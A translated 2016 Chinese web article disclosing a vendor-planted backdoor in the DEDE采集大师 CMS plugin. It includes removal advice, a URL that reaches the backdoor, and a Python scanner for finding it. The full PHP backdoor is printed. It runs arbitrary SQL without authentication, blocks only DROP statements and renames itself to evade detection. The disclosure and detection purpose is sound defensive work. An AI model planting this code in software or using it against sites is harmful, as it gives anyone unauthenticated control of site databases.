How to Remove the Vendor-Planted Backdoor in DEDE采集大师 (DEDE Collection Master)
Published: 2016-12-29 Source: 查字典 editor

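How to remove the vendor's backdoor: after installing 采集大师, immediately delete the file dedesql.query.php in the include directory. If the plugin is already installed, the file may have been renamed to arc.sqlquery.class.php; find it and delete it. This file can be used to query the site's database without any login verification, and to update, delete, and query data. You can test for yourself whether it is as I describe: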

http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo

Entering the URL above opens the backdoor interface.

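Frankly, the best way to deal with a program that deliberately ships a backdoor is not to use it. This backdoor has been found, but who knows whether the next so-called new version will bring more of them. The code of the backdoor file is as follows: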


<?php

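// Loads the CMS core only. No login or permission check follows, so every
// branch below is reachable without authentication. common.inc.php is also
// what exposes request parameters as the globals used here
// ($dopost, $tablename, $sqlquery, $querytype).
require_once(dirname(__FILE__)."/../include/common.inc.php");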

if(empty($dopost))

{

$dopost = "";

}

if($dopost=="rename")

{

if(rename('dedesql.query.php','arc.sqlquery.class.php')){

echo "成功!";

}else{

echo "失败!";

}

exit();

}

if($dopost=="viewinfo")

{

if(empty($tablename))

{

echo "没有指定表名!";

}

else

{

$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename);

$dsql->Execute('me');

$row2 = $dsql->GetArray('me',MYSQL_BOTH);

$ctinfo = $row2[1];

echo "<xmp>".trim($ctinfo)."</xmp>";

}

exit();

}

if($dopost=="index")

{

require_once(DEDEINC.'/arc.partview.class.php');

$envs = $_sys_globals = array();

$envs['aid'] = 0;

$pv = new PartView();

$row = $pv->dsql->GetOne('Select * From `#@__homepageset`');

$templet = str_replace("{style}",$cfg_df_style,$row['templet']);

$homeFile = dirname(__FILE__).'/'.$row['position'];

$homeFile = str_replace("//","/",str_replace("\\","/",$homeFile));

$fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置");

fclose($fp);

$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet;

$pv->SetTemplet($tpl);

$pv->SaveToHtml($homeFile);

$pv->Close();

echo "成功更新首页!";

exit();

}

else if($dopost=="query")

{

$sqlquery = trim(stripslashes($sqlquery));

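// The only restriction: statements matching DROP TABLE / DROP DATABASE are refused.
// Every other statement in $sqlquery is executed as submitted.
if(eregi("drop(.*)table",$sqlquery) || eregi("drop(.*)database",$sqlquery))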

{

echo "<span>删除'数据表'或'数据库'的语句不允许在这里执行。</span>";

exit();

}

if(eregi("^select ",$sqlquery))

{

$dsql->SetQuery($sqlquery);

$dsql->Execute();

if($dsql->GetTotalRow()<=0)

{

echo "运行SQL:{$sqlquery},无返回记录!";

}

else

{

echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!";

}

$j = 0;

while($row = $dsql->GetArray())

{

$j++;

if($j>100)

{

break;

}

echo "<hr size=1 width='100%'/>";

echo "记录:$j";

echo "<hr size=1 width='100%'/>";

foreach($row as $k=>$v)

{

echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n";

}

}

exit();

}

if($querytype==2)

{

$sqlquery = str_replace("\r","",$sqlquery);

$sqls = split(";[ \t]{0,}\n",$sqlquery);

$nerrCode = "";$i=0;

foreach($sqls as $q)

{

$q = trim($q);

if($q=="")

{

continue;

}

$dsql->ExecuteNoneQuery($q);

$errCode = trim($dsql->GetError());

if($errCode=="")

{

$i++;

}

else

{

$nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>";

}

}

echo "成功执行{$i}个SQL语句!<br><br>";

echo $nerrCode;

}

else

{

$dsql->ExecuteNoneQuery($sqlquery);

$nerrCode = trim($dsql->GetError());

echo "成功执行1个SQL语句!<br><br>";

echo $nerrCode;

}

exit();

}

if($dopost=="view")

{

;echo '<html>

<head>

<meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'>

<title>SQL命令行工具</title>

<link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'>

</head>

<body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'>

<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA">

<tr>

<td height="19" background="img/tbg.gif">

<table width="96%" border="0" cellspacing="1" cellpadding="1">

<tr>

<td width="24%"><strong>SQL命令运行器:</strong></td>

<td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b>

| <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b>

</td>

</tr>

</table>

</td>

</tr>

<tr>

<td height="200" bgcolor="#FFFFFF" valign="top">

<table width="100%" border="0" cellspacing="4" cellpadding="2">

<form action="" method="post" name="infoform" target="stafrm">

<input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' />

<tr bgcolor="#F3FBEC">

<td width="15%" height="24" align="center">系统的表信息:</td>

<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>

<td width="35%">

<select name="tablename" id="tablename" size="6">

';

$dsql->SetQuery("Show Tables");

$dsql->Execute('t');

while($row = $dsql->GetArray('t',MYSQL_BOTH))

{

$dsql->SetQuery("Select count(*) From ".$row[0]);

$dsql->Execute('n');

$row2 = $dsql->GetArray('n',MYSQL_BOTH);

$dd = $row2[0];

echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n";

}

;echo ' </select>

</td>

<td width="2%"></td>

<td width="63%" valign="bottom">

<div>

<input type="Submit" name="Submit1" value="优化选中表" />

<br />

<input type="Submit" name="Submit2" value="修复选中表" />

<br />

<input type="Submit" name="Submit3" value="查看表结构" />

</div>

<div>

<input type="Submit" name="Submit5" value="优化全部表" />

<br />

<input type="Submit" name="Submit6" value="修复全部表" />

</div>

</td>

</tr>

</table></td>

</tr>

<tr>

<td height="200" align="center">返回信息:</td>

<td>

<iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe>

</td>

</tr>

</form>

<form action="" method="post" name="form1" target="stafrm">

<input type=\'hidden\' name=\'dopost\' value=\'query\'>

<tr>

<td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行:

<input name="querytype" type="radio" value="0">

单行命令(支持简单查询)

<input name="querytype" type="radio" value="2" checked>

多行命令</strong></td>

</tr>

<tr>

<td height="118" colspan="2">

<textarea name="sqlquery" cols="60" rows="10" id="sqlquery"></textarea>

</td>

</tr>

<tr>

<td height="53" align="center"></td>

<td>

<input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" />

</td>

</tr>

</form>

</table>

</td>

</tr>

</table>

</body>

</html>

';}

?>
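
Because the file can rename itself, a check by file name alone can miss it. The following is an added example, not part of the original article or the plugin: a Python scan of a web root that flags PHP files either by the two names given above or by content markers taken from the listing. The threshold of two markers, the 1 MiB read limit and the sample tree are assumptions made for illustration.

```python
import os
import re
import tempfile

# File names given on the page: the original name and the name it renames itself to.
KNOWN_NAMES = {"dedesql.query.php", "arc.sqlquery.class.php"}
# Content markers taken from the listing above; a renamed copy still carries them.
MARKERS = [
    re.compile(rb"""\$dopost\s*==\s*["']query["']"""),
    re.compile(rb"ExecuteNoneQuery\(\s*\$sqlquery\s*\)"),
    re.compile(rb"""rename\(\s*['"]dedesql\.query\.php['"]"""),
]

def scan_webroot(root):
    """Return {relative_path: [reasons]} for PHP files matching name or content."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            reasons = []
            if name.lower() in KNOWN_NAMES:
                reasons.append("known-name")
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1 << 20)  # assumed cap: first 1 MiB
            except OSError:
                data = b""  # unreadable file: fall back to the name check only
            hits = sum(1 for m in MARKERS if m.search(data))
            if hits >= 2:  # assumed threshold: two of the three markers
                reasons.append("content-markers:%d" % hits)
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def build_sample_tree():
    """Constructed sample web root: one renamed copy and one benign file."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "include"))
    with open(os.path.join(root, "include", "helper.class.php"), "w") as fh:
        fh.write("<?php if($dopost==\"query\"){ $dsql->ExecuteNoneQuery($sqlquery); }")
    with open(os.path.join(root, "include", "common.func.php"), "w") as fh:
        fh.write("<?php function GetIP(){ return ''; }")
    return root

if __name__ == "__main__":
    for path, reasons in sorted(scan_webroot(build_sample_tree()).items()):
        print(path, reasons)
```

Treat content matches as candidates for review rather than automatic deletion, since an administrator-only SQL tool that checks login could share the same lines; the article's advice concerns copies under include/.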
